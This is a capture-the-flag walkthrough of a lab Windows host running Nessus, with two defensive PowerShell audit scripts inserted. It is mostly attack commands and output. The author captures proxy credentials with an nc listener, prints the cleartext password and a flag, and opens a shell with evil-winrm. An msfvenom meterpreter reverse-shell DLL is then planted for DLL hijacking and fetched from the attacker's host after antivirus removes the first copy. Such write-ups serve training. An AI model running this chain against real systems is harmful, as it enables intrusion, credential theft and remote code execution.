image-20250721205230320

Information gathering

┌──(root㉿kali)-[~]
└─# arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:96:80:36, IPv4: 192.168.56.103
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0e (Unknown: locally administered)
192.168.56.100 08:00:27:81:30:5f PCS Systemtechnik GmbH
192.168.56.156 08:00:27:c0:51:50 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.242 seconds (114.18 hosts/sec). 3 responded

┌──(root㉿kali)-[~]
└─# nmap -sV -sC -p- 192.168.56.156
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-22 08:01 EDT
Nmap scan report for 192.168.56.156
Host is up (0.00057s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8834/tcp open ssl/nessus-xmlrpc?
| ssl-cert: Subject: commonName=WIN-C05BOCC7F0H/organizationName=Nessus Users United/stateOrProvinceName=NY/countryName=US
| Not valid before: 2024-10-18T17:36:17
|_Not valid after: 2028-10-17T17:36:17
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Cache-Control: must-revalidate
| X-Frame-Options: DENY
| Content-Type: text/html
| ETag: fc785d9fb222132265fb83f9adb1608e
| Connection: close
| X-XSS-Protection: 1; mode=block
| Server: NessusWWW
| Date: Wed, 23 Jul 2025 03:02:58 GMT
| X-Content-Type-Options: nosniff
| Content-Length: 1217
| Content-Security-Policy: upgrade-insecure-requests; block-all-mixed-content; form-action 'self'; frame-ancestors 'none'; frame-src https://store.tenable.com; default-src 'self'; connect-src 'self' www.tenable.com; script-src 'self' www.tenable.com; img-src 'self' data:; style-src 'self' www.tenable.com; object-src 'none'; base-uri 'self';
| Strict-Transport-Security: max-age=31536000
| Expect-CT: max-age=0
| <!doctype html>
| <html lang="en">
| <head>
| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
|_ <meta http-equiv="Content-Security-Policy" content="upgrade-inse
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8834-TCP:V=7.94SVN%T=SSL%I=7%D=7/22%Time=687F7DF3%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,788,"HTTP/1\.1\x20200\x20OK\r\nCache-Control:\x20must
SF:-revalidate\r\nX-Frame-Options:\x20DENY\r\nContent-Type:\x20text/html\r
SF:\nETag:\x20fc785d9fb222132265fb83f9adb1608e\r\nConnection:\x20close\r\n
SF:X-XSS-Protection:\x201;\x20mode=block\r\nServer:\x20NessusWWW\r\nDate:\
SF:x20Wed,\x2023\x20Jul\x202025\x2003:02:58\x20GMT\r\nX-Content-Type-Optio
SF:ns:\x20nosniff\r\nContent-Length:\x201217\r\nContent-Security-Policy:\x
SF:20upgrade-insecure-requests;\x20block-all-mixed-content;\x20form-action
SF:\x20'self';\x20frame-ancestors\x20'none';\x20frame-src\x20https://store
SF:\.tenable\.com;\x20default-src\x20'self';\x20connect-src\x20'self'\x20w
SF:ww\.tenable\.com;\x20script-src\x20'self'\x20www\.tenable\.com;\x20img-
SF:src\x20'self'\x20data:;\x20style-src\x20'self'\x20www\.tenable\.com;\x2
SF:0object-src\x20'none';\x20base-uri\x20'self';\r\nStrict-Transport-Secur
SF:ity:\x20max-age=31536000\r\nExpect-CT:\x20max-age=0\r\n\r\n<!doctype\x2
SF:0html>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE
SF:=edge,chrome=1\"\x20/>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-e
SF:quiv=\"Content-Security-Policy\"\x20content=\"upgrade-inse");
MAC Address: 08:00:27:C0:51:50 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: NESSUS, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:c0:51:50 (Oracle VirtualBox virtual NIC)
|_clock-skew: 14h59m58s
| smb2-time:
| date: 2025-07-23T03:04:44
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.58 seconds

There is a login page, reachable over HTTPS.

image-20250721211236861

When brute-forcing directories, add the -k flag so gobuster ignores SSL/TLS certificate verification errors (the Nessus certificate is self-signed).

gobuster dir -u https://192.168.56.156:8834 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html,.txt,.xml -k

Let's look at the SMB service for a way in.

┌──(root㉿kali)-[~]
└─# smbclient -L \\192.168.56.156 -N

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.156 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(root㉿kali)-[~]
└─# smbclient \\\\192.168.56.156\\Documents -N
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Fri Oct 18 20:42:53 2024
.. D 0 Sat Oct 19 01:08:23 2024
desktop.ini AHS 402 Sat Jun 15 13:54:33 2024
My Basic Network Scan_hwhm7q.pdf A 122006 Fri Oct 18 18:19:59 2024
My Music DHSrn 0 Sat Jun 15 13:54:27 2024
My Pictures DHSrn 0 Sat Jun 15 13:54:27 2024
My Videos DHSrn 0 Sat Jun 15 13:54:27 2024
Web Application Tests_f6jg9t.pdf A 136025 Fri Oct 18 18:20:14 2024

12942591 blocks of size 4096. 10994381 blocks available

The share can be accessed anonymously, without credentials.

smb: \> mget *
Get file desktop.ini? y
getting file \desktop.ini of size 402 as desktop.ini (23.1 KiloBytes/sec) (average 23.1 KiloBytes/sec)
Get file My Basic Network Scan_hwhm7q.pdf? y
getting file \My Basic Network Scan_hwhm7q.pdf of size 122006 as My Basic Network Scan_hwhm7q.pdf (2382.9 KiloBytes/sec) (average 1784.2 KiloBytes/sec)
Get file Web Application Tests_f6jg9t.pdf? y
getting file \Web Application Tests_f6jg9t.pdf of size 136025 as Web Application Tests_f6jg9t.pdf (2711.0 KiloBytes/sec) (average 2175.7 KiloBytes/sec)
smb: \>

The two PDFs are Nessus scan reports.

But the box author said no CVE exploitation is needed, so let's see what hidden information the PDFs hold.

Use exiftool to read the file metadata.

┌──(root㉿kali)-[/myift/bachang/win/nessus]
└─# exiftool *
======== desktop.ini
ExifTool Version Number : 12.76
File Name : desktop.ini
Directory : .
File Size : 402 bytes
File Modification Date/Time : 2025:07:21 21:31:27-04:00
File Access Date/Time : 2025:07:21 21:32:50-04:00
File Inode Change Date/Time : 2025:07:21 21:31:27-04:00
File Permissions : -rw-r--r--
File Type : TXT
File Type Extension : txt
MIME Type : text/plain
MIME Encoding : utf-16le
Byte Order Mark : Yes
Newlines : Windows CRLF
======== My Basic Network Scan_hwhm7q.pdf
ExifTool Version Number : 12.76
File Name : My Basic Network Scan_hwhm7q.pdf
Directory : .
File Size : 122 kB
File Modification Date/Time : 2025:07:21 21:31:29-04:00
File Access Date/Time : 2025:07:21 21:33:22-04:00
File Inode Change Date/Time : 2025:07:21 21:31:29-04:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
Linearized : No
Page Count : 5
Profile CMM Type : Little CMS
Profile Version : 2.3.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2004:08:13 12:18:06
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Little CMS
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Little CMS
Profile ID : 7fb30d688bf82d32a0e748daf3dba95d
Device Mfg Desc : lcms generated
Profile Description : sRGB
Device Model Desc : sRGB
Media White Point : 0.95015 1 1.08826
Red Matrix Column : 0.43585 0.22238 0.01392
Blue Matrix Column : 0.14302 0.06059 0.71384
Green Matrix Column : 0.38533 0.71704 0.09714
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Chromaticity Channels : 3
Chromaticity Colorant : Unknown
Chromaticity Channel 1 : 0.64 0.33
Chromaticity Channel 2 : 0.3 0.60001
Chromaticity Channel 3 : 0.14999 0.06
Profile Copyright : no copyright, use freely
XMP Toolkit : Image::ExifTool 12.76
Date : 2024:10:18 15:10:05+02:00
Format : application/pdf
Language : x-unknown
Author : Jose
PDF Version : 1.4
Producer : Apache FOP Version 2.8
Create Date : 2024:10:18 15:10:05+02:00
Creator Tool : Apache FOP Version 2.8
Metadata Date : 2024:10:18 15:10:05+02:00
Page Mode : UseOutlines
Creator : Apache FOP Version 2.8
======== Web Application Tests_f6jg9t.pdf
ExifTool Version Number : 12.76
File Name : Web Application Tests_f6jg9t.pdf
Directory : .
File Size : 136 kB
File Modification Date/Time : 2025:07:21 21:31:30-04:00
File Access Date/Time : 2025:07:21 21:33:23-04:00
File Inode Change Date/Time : 2025:07:21 21:31:30-04:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
Linearized : No
Page Count : 6
Profile CMM Type : Little CMS
Profile Version : 2.3.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2004:08:13 12:18:06
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Little CMS
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Little CMS
Profile ID : 7fb30d688bf82d32a0e748daf3dba95d
Device Mfg Desc : lcms generated
Profile Description : sRGB
Device Model Desc : sRGB
Media White Point : 0.95015 1 1.08826
Red Matrix Column : 0.43585 0.22238 0.01392
Blue Matrix Column : 0.14302 0.06059 0.71384
Green Matrix Column : 0.38533 0.71704 0.09714
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Chromaticity Channels : 3
Chromaticity Colorant : Unknown
Chromaticity Channel 1 : 0.64 0.33
Chromaticity Channel 2 : 0.3 0.60001
Chromaticity Channel 3 : 0.14999 0.06
Profile Copyright : no copyright, use freely
XMP Toolkit : Image::ExifTool 12.76
Date : 2024:10:18 15:10:19+02:00
Format : application/pdf
Language : x-unknown
Author : Jose
PDF Version : 1.4
Producer : Apache FOP Version 2.8
Create Date : 2024:10:18 15:10:19+02:00
Creator Tool : Apache FOP Version 2.8
Metadata Date : 2024:10:18 15:10:19+02:00
Page Mode : UseOutlines
Creator : Apache FOP Version 2.8
3 image files read

It contains:

Author                          : Jose

Use it directly as the username and start brute-forcing the login.

image-20250722162021100

The password comes back as tequiero.

After logging in we find:

image-20250722180735188

The proxy password is masked and cannot be read.

But we can change the proxy server setting to point at our Kali box and catch what Nessus sends:

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.156] 49742
CONNECT plugins.nessus.org:443 HTTP/1.1
Proxy-Authorization: Basic bmVzdXM6WiNKdVhIJHBoLTt2QCxYJm1WKQ==
Host: plugins.nessus.org
Connection: keep-Alive
User-Agent: Nessus/10.7.3
Content-Length: 0
Proxy-Connection: Keep-Alive

That gives us the base64 of the credentials (Basic proxy authentication is just base64 of user:password).

image-20250722180922066

But SSH and remote desktop are not open, so let's try the credentials against SMB.

┌──(root㉿kali)-[~]
└─# crackmapexec smb 192.168.56.156 -u 'nesus' -p 'Z#JuXH$ph-;v@,X&mV)' --shares
SMB 192.168.56.156 445 NESSUS [*] Windows Server 2022 Build 20348 x64 (name:NESSUS) (domain:Nessus) (signing:False) (SMBv1:False)
SMB 192.168.56.156 445 NESSUS [-] Nessus\nesus:Z#JuXH$ph-;v@,X&mV) STATUS_PASSWORD_EXPIRED

The password has simply expired.

Just reset it.

┌──(root㉿kali)-[~]
└─# crackmapexec smb 192.168.56.156 -u '' -p '' --shares
SMB 192.168.56.156 445 NESSUS [*] Windows Server 2022 Build 20348 x64 (name:NESSUS) (domain:Nessus) (signing:False) (SMBv1:False)
SMB 192.168.56.156 445 NESSUS [-] Nessus\: STATUS_ACCESS_DENIED
SMB 192.168.56.156 445 NESSUS [-] Error enumerating shares: Error occurs while reading from remote(104)

┌──(root㉿kali)-[~]
└─# crackmapexec smb 192.168.56.156 -u 'anonymous' -p '' --shares
SMB 192.168.56.156 445 NESSUS [*] Windows Server 2022 Build 20348 x64 (name:NESSUS) (domain:Nessus) (signing:False) (SMBv1:False)
SMB 192.168.56.156 445 NESSUS [+] Nessus\anonymous:
SMB 192.168.56.156 445 NESSUS [+] Enumerated shares
SMB 192.168.56.156 445 NESSUS Share Permissions Remark
SMB 192.168.56.156 445 NESSUS ----- ----------- ------
SMB 192.168.56.156 445 NESSUS ADMIN$ Remote Admin
SMB 192.168.56.156 445 NESSUS C$ Default share
SMB 192.168.56.156 445 NESSUS Documents READ,WRITE
SMB 192.168.56.156 445 NESSUS IPC$ READ Remote IPC

Nothing special in terms of permissions.
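The anonymous listing above and the READ,WRITE entry for the Documents share are the kind of exposure a file-server owner can audit directly. The following PowerShell is an added example written for this note, not part of the original writeup; it assumes it is run in an elevated PowerShell on the Windows file server being audited, and reports write-capable share permissions granted to catch-all principals, the server's null-session settings, and enabled local accounts that do not require a password (a blank-password account behaves much like anonymous access once its name is known).

```powershell
# Added example (not from the original writeup): audit the conditions that let
# an anonymous SMB session read and write a share, as seen with the Documents
# share above. Assumption: run in an elevated PowerShell on the file server.

# 1. Share-level permissions granted to unauthenticated or catch-all principals.
#    Special shares (ADMIN$, C$, IPC$) are skipped; Windows fixes their ACLs.
$openPrincipal = 'Everyone|ANONYMOUS LOGON|Guests'

$findings = Get-SmbShare | Where-Object { -not $_.Special } | ForEach-Object {
    $share = $_
    Get-SmbShareAccess -Name $share.Name | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.AccountName -match $openPrincipal -and
        $_.AccessRight -match '^(Change|Full)$'      # write-capable share rights
    } | ForEach-Object {
        [pscustomobject]@{
            Share     = $share.Name
            Path      = $share.Path
            Principal = $_.AccountName
            Right     = $_.AccessRight
        }
    }
}
$findings | Format-Table -AutoSize

# 2. Null-session policy on the server. With RestrictNullSessAccess = 1 (the
#    default) an unauthenticated session only reaches shares listed in
#    NullSessionShares; a value of 0 or an over-broad list widens exposure.
$lanman = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
[pscustomobject]@{
    RestrictNullSessAccess = $lanman.RestrictNullSessAccess
    NullSessionShares      = ($lanman.NullSessionShares -join ', ')
}

# 3. Enabled local accounts that do not require a password.
Get-LocalUser | Where-Object { $_.Enabled -and -not $_.PasswordRequired } |
    Select-Object Name, Enabled, PasswordRequired, LastLogon
```

Share permissions are only half of the picture: the effective access is the intersection of the share ACL and the NTFS ACL on the folder, so a Change grant to Everyone on the share is harmless only if the directory ACL itself is tight.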

Get a shell with evil-winrm; port 5985 (WinRM) is open.

┌──(root㉿kali)-[~]
└─# evil-winrm -i 192.168.56.156 -u nesus -p '123456'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nesus\Documents> dir
*Evil-WinRM* PS C:\Users\nesus\Documents> ls
*Evil-WinRM* PS C:\Users\nesus\Documents> cd ..
*Evil-WinRM* PS C:\Users\nesus> ls


Directory: C:\Users\nesus


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/22/2025 6:22 PM 3D Objects
d-r--- 7/22/2025 6:22 PM Contacts
d-r--- 7/22/2025 6:22 PM Desktop
d-r--- 7/22/2025 6:22 PM Documents
d-r--- 7/22/2025 6:22 PM Downloads
d-r--- 7/22/2025 6:22 PM Favorites
d-r--- 7/22/2025 6:22 PM Links
d-r--- 7/22/2025 6:22 PM Music
d-r--- 7/22/2025 6:22 PM Pictures
d-r--- 7/22/2025 6:22 PM Saved Games
d-r--- 7/22/2025 6:22 PM Searches
d-r--- 7/22/2025 6:22 PM Videos


*Evil-WinRM* PS C:\Users\nesus> cd Desktop
*Evil-WinRM* PS C:\Users\nesus\Desktop> ls


Directory: C:\Users\nesus\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/18/2024 1:41 PM 33 user.txt


*Evil-WinRM* PS C:\Users\nesus\Desktop> cat user.txt
72113f41d43e88eb5d67f732668bc3d1

Upload winPEAS and run a scan.

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nesus\Documents> upload winPEAS.exe winPEAS.exe

Info: Uploading /myift/peas/winPEAS.exe to C:\Users\nesus\Documents\winPEAS.exe

Data: 13333844 bytes of 13333844 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\nesus\Documents> .\winPEAS.exe
[!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD


=================================================================================================

Tenable Nessus(Tenable, Inc. - Tenable Nessus)["C:\Program Files\Tenable\Nessus\nessus-service.exe"] - Autoload
File Permissions: nesus [AllAccess]
Possible DLL Hijacking in binary folder: C:\Program Files\Tenable\Nessus (nesus [AllAccess])
Tenable Nessus Network Security Scanner
=================================================================================================

This tells us that the Tenable Nessus vulnerability scanner is installed on the target system,

and that the current user nesus has AllAccess (full control) over the service binary nessus-service.exe.

It explicitly flags a possible DLL hijacking vulnerability in the Nessus installation directory C:\Program Files\Tenable\Nessus.

Let's try it.
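The condition winPEAS reports here, a service binary directory that an unprivileged account can write to, is something a defender can audit across every service on a host rather than one directory at a time. The following PowerShell is an added example written for this note, not code from the original writeup or from winPEAS; it assumes it is run in an elevated PowerShell on the host being audited, and lists every service whose install directory grants write rights to a principal outside the expected administrative set, together with the account the service runs as.

```powershell
# Added example (not from the original writeup or from winPEAS): report every
# Windows service whose binary lives in a directory writable by a principal
# outside the expected administrative set. That is the condition flagged above
# for C:\Program Files\Tenable\Nessus. Assumption: run in an elevated PowerShell
# on the host being audited.

# NTFS rights that allow creating or replacing a file in the directory, plus the
# generic access bits that some inherited ACEs are expressed with.
$writeMask   = [int][System.Security.AccessControl.FileSystemRights]::Write  # WriteData|AppendData|WriteEA|WriteAttributes
$genericMask = 0x40000000 -bor 0x10000000                                    # GENERIC_WRITE | GENERIC_ALL
$mask = $writeMask -bor $genericMask

# Principals expected to write under Program Files; any other Allow ACE is reported.
$trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
             'NT SERVICE\TrustedInstaller', 'CREATOR OWNER')

function Get-ServiceBinaryDirectory {
    param([string]$PathName)
    # ImagePath forms: "C:\Program Files\X\svc.exe" -args   or   C:\Windows\system32\svchost.exe -k netsvcs
    if ($PathName -match '^"([^"]+)"')      { $exe = $Matches[1] }
    elseif ($PathName -match '^(.+?\.exe)') { $exe = $Matches[1] }
    else { return $null }
    Split-Path -Parent $exe
}

Get-CimInstance Win32_Service | Where-Object { $_.PathName } | ForEach-Object {
    $svc = $_
    $dir = Get-ServiceBinaryDirectory $svc.PathName
    if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { return }

    foreach ($ace in (Get-Acl -LiteralPath $dir).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($trusted -contains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $mask) -eq 0) { continue }

        [pscustomobject]@{
            Service   = $svc.Name
            RunsAs    = $svc.StartName          # LocalSystem means a planted DLL would run as SYSTEM
            Directory = $dir
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
        }
    }
} | Sort-Object Directory | Format-Table -AutoSize
```

A hit where RunsAs is LocalSystem and Principal is an ordinary user is exactly the winPEAS finding above; the fix is to restore the default Program Files ACL on the directory (Administrators, SYSTEM and TrustedInstaller write; Users read and execute) and to confirm the installer did not leave a custom grant behind.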

*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> ls


Directory: C:\Program Files\Tenable\Nessus


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/18/2024 10:35 AM 1 .winperms
-a---- 5/9/2024 11:30 PM 2471544 fips.dll
-a---- 5/9/2024 11:30 PM 5217912 icudt73.dll
-a---- 5/9/2024 11:30 PM 1575032 icuuc73.dll
-a---- 5/9/2024 11:30 PM 4988536 legacy.dll
-a---- 5/9/2024 11:06 PM 375266 License.rtf
-a---- 5/9/2024 11:37 PM 11204728 nasl.exe
-a---- 5/9/2024 11:31 PM 264824 ndbg.exe
-a---- 5/9/2024 11:06 PM 46 Nessus Web Client.url
-a---- 5/9/2024 11:33 PM 38520 nessus-service.exe
-a---- 5/9/2024 11:37 PM 11143800 nessuscli.exe
-a---- 5/9/2024 11:38 PM 11925624 nessusd.exe
-a---- 7/22/2025 9:29 PM 0 version.dll

Create the malicious DLL.

┌──(root㉿kali)-[/myift/bachang/win/nessus]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=4445 -f dll -o version.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of dll file: 9216 bytes
Saved as: version.dll

Upload the malicious DLL.

*Evil-WinRM* PS C:\Users\nesus\Documents> upload version.dll "C:\Program Files\Tenable\Nessus\version.dll"

Info: Uploading /myift/bachang/win/nessus/version.dll to C:\Program Files\Tenable\Nessus\version.dll

Data: 12288 bytes of 12288 bytes copied

Info: Upload successful!

Start the listener.

└─# msfconsole
Metasploit tip: Use sessions -1 to interact with the last opened session



=[ metasploit v6.4.50-dev ]
+ -- --=[ 2496 exploits - 1283 auxiliary - 431 post ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4445
LPORT => 4445
msf6 exploit(multi/handler) > set LHOST 192.168.56.103
LHOST => 192.168.56.103
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.103:4445

A reverse shell uploaded directly like this gets removed by antivirus (note the 0-byte version.dll below).

*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> upload version.dll version.dll

Info: Uploading /myift/bachang/win/nessus/version.dll to C:\Program Files\Tenable\Nessus\version.dll

Data: 12288 bytes of 12288 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> ls


Directory: C:\Program Files\Tenable\Nessus


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/18/2024 10:35 AM 1 .winperms
-a---- 5/9/2024 11:30 PM 2471544 fips.dll
-a---- 5/9/2024 11:30 PM 5217912 icudt73.dll
-a---- 5/9/2024 11:30 PM 1575032 icuuc73.dll
-a---- 5/9/2024 11:30 PM 4988536 legacy.dll
-a---- 5/9/2024 11:06 PM 375266 License.rtf
-a---- 5/9/2024 11:37 PM 11204728 nasl.exe
-a---- 5/9/2024 11:31 PM 264824 ndbg.exe
-a---- 5/9/2024 11:06 PM 46 Nessus Web Client.url
-a---- 5/9/2024 11:33 PM 38520 nessus-service.exe
-a---- 5/9/2024 11:37 PM 11143800 nessuscli.exe
-a---- 5/9/2024 11:38 PM 11925624 nessusd.exe
-a---- 7/22/2025 9:35 PM 16 start
-a---- 7/22/2025 9:35 PM 16 stop
-a---- 7/22/2025 9:41 PM 0 version.dll

image-20250722214529663

*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> Invoke-WebRequest -Uri http://192.168.56.103:8888/version.dll -OutFile version.dll
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> ls


Directory: C:\Program Files\Tenable\Nessus


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/18/2024 10:35 AM 1 .winperms
-a---- 5/9/2024 11:30 PM 2471544 fips.dll
-a---- 5/9/2024 11:30 PM 5217912 icudt73.dll
-a---- 5/9/2024 11:30 PM 1575032 icuuc73.dll
-a---- 5/9/2024 11:30 PM 4988536 legacy.dll
-a---- 5/9/2024 11:06 PM 375266 License.rtf
-a---- 5/9/2024 11:37 PM 11204728 nasl.exe
-a---- 5/9/2024 11:31 PM 264824 ndbg.exe
-a---- 5/9/2024 11:06 PM 46 Nessus Web Client.url
-a---- 5/9/2024 11:33 PM 38520 nessus-service.exe
-a---- 5/9/2024 11:37 PM 11143800 nessuscli.exe
-a---- 5/9/2024 11:38 PM 11925624 nessusd.exe
-a---- 7/22/2025 9:35 PM 16 start
-a---- 7/22/2025 9:35 PM 16 stop
-a---- 7/23/2025 9:49 AM 9216 version.dll

Oh! This way the upload succeeded.

But it had no effect.

Try a different DLL.

*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> Invoke-WebRequest -Uri http://192.168.56.103:8888/version.dll -OutFile legacy.dll
The process cannot access the file 'C:\Program Files\Tenable\Nessus\legacy.dll' because it is being used by another process.
At line:1 char:1
+ Invoke-WebRequest -Uri http://192.168.56.103:8888/version.dll -OutFil ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Invoke-WebRequest], IOException
+ FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> ls


Directory: C:\Program Files\Tenable\Nessus


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/18/2024 10:35 AM 1 .winperms
-a---- 5/9/2024 11:30 PM 2471544 fips.dll
-a---- 5/9/2024 11:30 PM 5217912 icudt73.dll
-a---- 5/9/2024 11:30 PM 1575032 icuuc73.dll
-a---- 5/9/2024 11:30 PM 4988536 legacy.dll
-a---- 5/9/2024 11:06 PM 375266 License.rtf
-a---- 5/9/2024 11:37 PM 11204728 nasl.exe
-a---- 5/9/2024 11:31 PM 264824 ndbg.exe
-a---- 5/9/2024 11:06 PM 46 Nessus Web Client.url
-a---- 5/9/2024 11:33 PM 38520 nessus-service.exe
-a---- 5/9/2024 11:37 PM 11143800 nessuscli.exe
-a---- 5/9/2024 11:38 PM 11925624 nessusd.exe
-a---- 7/22/2025 9:35 PM 16 start
-a---- 7/22/2025 9:35 PM 16 stop
-a---- 7/23/2025 9:49 AM 9216 version.dll


*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> Invoke-WebRequest -Uri http://192.168.56.103:8888/version.dll -OutFile 1.dll
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> ls


Directory: C:\Program Files\Tenable\Nessus


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/18/2024 10:35 AM 1 .winperms
-a---- 7/23/2025 9:59 AM 9216 1.dll
-a---- 5/9/2024 11:30 PM 2471544 fips.dll
-a---- 5/9/2024 11:30 PM 5217912 icudt73.dll
-a---- 5/9/2024 11:30 PM 1575032 icuuc73.dll
-a---- 5/9/2024 11:30 PM 4988536 legacy.dll
-a---- 5/9/2024 11:06 PM 375266 License.rtf
-a---- 5/9/2024 11:37 PM 11204728 nasl.exe
-a---- 5/9/2024 11:31 PM 264824 ndbg.exe
-a---- 5/9/2024 11:06 PM 46 Nessus Web Client.url
-a---- 5/9/2024 11:33 PM 38520 nessus-service.exe
-a---- 5/9/2024 11:37 PM 11143800 nessuscli.exe
-a---- 5/9/2024 11:38 PM 11925624 nessusd.exe
